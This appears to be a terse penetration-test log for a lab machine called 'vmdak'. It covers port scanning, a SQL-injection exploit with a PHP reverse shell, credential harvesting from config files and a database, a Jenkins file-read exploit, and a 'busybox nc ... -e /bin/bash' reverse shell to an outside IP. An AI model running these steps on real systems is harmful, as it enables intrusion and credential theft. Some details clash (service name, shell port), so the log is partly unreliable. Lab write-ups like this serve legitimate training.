vmdak
Pentest Log: 2025-08-03
Target Information
- Machine Name: vmdak
- IP Address: 192.168.223.103
- Operating System: Linux
ip=192.168.223.103
Enumeration
Port Scanning
Command Used
ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt
nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt
Port 21
ftp anonymous@$ip
Port 22
Port 80
Web Content Enumeration
gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt
dirsearch -u http://$ip -r -o dirsearch.txt
Port 9443
Maltrail v0.52
Googled "Prison Management System exploit", found:
CVE-2024-33288
Exploitation
Vulnerability Summary
- Service / Port: 9443
- Vulnerability Type: SQLi
Exploit Execution
Exploit Method
Tool / Script Used:
https://www.exploit-db.com/exploits/52017
Upload a PHP reverse shell
nc -lvnp 80
Found the database password:
www-data@vmdak:/var/www/prison/database$ cat connect.php
root:sqlCr3ds3xp0seD
Connected to the local database, found the vmdak password:
mysql -u root -p -h 127.0.0.1
use employee_akpoly;
select * from tblleave;
vmdak:RonnyCache001
Privilege Escalation
Current Access
- User: vmdak
- Groups: vmdak
- Shell Type: ssh
Enumeration
Running Process:
netstat -antup | grep -ni listen
grep -nRw '8080' /etc/* 2>/dev/null
Found:
Jenkins 2.401.2
Googled for an exploit, found:
https://github.com/godylockz/CVE-2024-23897
Privilege Escalation Exploit
Exploit Summary
- Technique Used: N/A
- Target Binary/Service: Jenkins
- Reference / Source: N/A
Exploit Steps
- Setup
./chisel server --port 8082 --reverse
./chisel client 192.168.45.163:8082 R:8085:127.0.0.1:8080
python3 jenkins_fileread.py -u http://127.0.0.1:8085 -f /root/.jenkins/secrets/initialAdminPassword
140ef31373034d19a77baa9c6b84a200
Create a new build task that runs:
busybox nc 192.168.45.163 444 -e /bin/bash
- Smash to root
nc -lvnp 4444